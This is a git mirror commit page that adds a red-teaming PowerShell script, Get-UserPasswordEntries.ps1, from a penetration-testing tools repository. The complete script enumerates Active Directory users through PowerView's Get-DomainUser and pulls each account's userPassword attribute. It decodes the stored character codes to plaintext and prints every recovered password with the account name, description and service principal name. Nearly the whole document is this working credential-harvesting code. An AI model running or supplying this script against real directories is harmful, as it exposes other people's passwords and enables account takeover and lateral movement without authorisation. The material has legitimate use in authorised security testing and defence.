mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-11-25 12:01:37 +01:00
Get-UserPasswordEntries.ps1
This commit is contained in:
parent
666c109456
commit
f9c56de0d4
60
red-teaming/Get-UserPasswordEntries.ps1
Normal file
60
red-teaming/Get-UserPasswordEntries.ps1
Normal file
@ -0,0 +1,60 @@
|
|||||||
|
<#
|
||||||
|
This script enumerates user accounts in Active Directory and then collects
|
||||||
|
their .userPassword properties, decodes them and prints out.
|
||||||
|
|
||||||
|
Assuming we have PowerView's Get-DomainUser command available.
|
||||||
|
|
||||||
|
Usage:
|
||||||
|
PS> . .\Get-UserPasswordEntries.ps1
|
||||||
|
PS> Get-UserPasswordEntries
|
||||||
|
|
||||||
|
Mariusz B. / mgeeky
|
||||||
|
#>
|
||||||
|
|
||||||
|
# This script requires PowerView 3.0 dev branch
|
||||||
|
# Import-Module powerview.ps1 -ErrorAction SilentlyContinue
|
||||||
|
|
||||||
|
Function Get-UserPasswordEntries
|
||||||
|
{
|
||||||
|
$num = 0
|
||||||
|
|
||||||
|
Get-DomainUser -Filter "(userpassword=*)" -Properties * | % {
|
||||||
|
$entry = $_
|
||||||
|
$passw = $entry | Select -ExpandProperty userpassword
|
||||||
|
$passw2 = $passw | % {[char][int]$_}
|
||||||
|
$passw3 = $passw2 -join ''
|
||||||
|
$name1 = $entry.samaccountname
|
||||||
|
try {
|
||||||
|
$desc = $entry.description
|
||||||
|
}
|
||||||
|
catch {
|
||||||
|
$desc = "<empty>"
|
||||||
|
}
|
||||||
|
|
||||||
|
try {
|
||||||
|
$name3 = $entry.serviceprincipalname
|
||||||
|
}
|
||||||
|
catch {
|
||||||
|
$name3 = "<empty>"
|
||||||
|
}
|
||||||
|
|
||||||
|
$num += 1
|
||||||
|
|
||||||
|
$obj = @{
|
||||||
|
SamAccountName = $name1
|
||||||
|
ServicePrincipalName = $name3
|
||||||
|
Description = $desc
|
||||||
|
UserPassword = $passw3
|
||||||
|
}
|
||||||
|
$object = new-object psobject -Property $obj
|
||||||
|
|
||||||
|
Write-Host $num".)"
|
||||||
|
Write-Host "SamAccountName:`t`t" $object.SamAccountName
|
||||||
|
Write-Host "Description:`t`t" $object.Description
|
||||||
|
Write-Host "ServicePrincipalName:`t" $object.ServicePrincipalName
|
||||||
|
Write-Host "UserPassword:`t`t" $object.UserPassword
|
||||||
|
Write-Host
|
||||||
|
}
|
||||||
|
|
||||||
|
Write-Host "Found in total: "$num" entries."
|
||||||
|
}
|
Loading…
Reference in New Issue
Block a user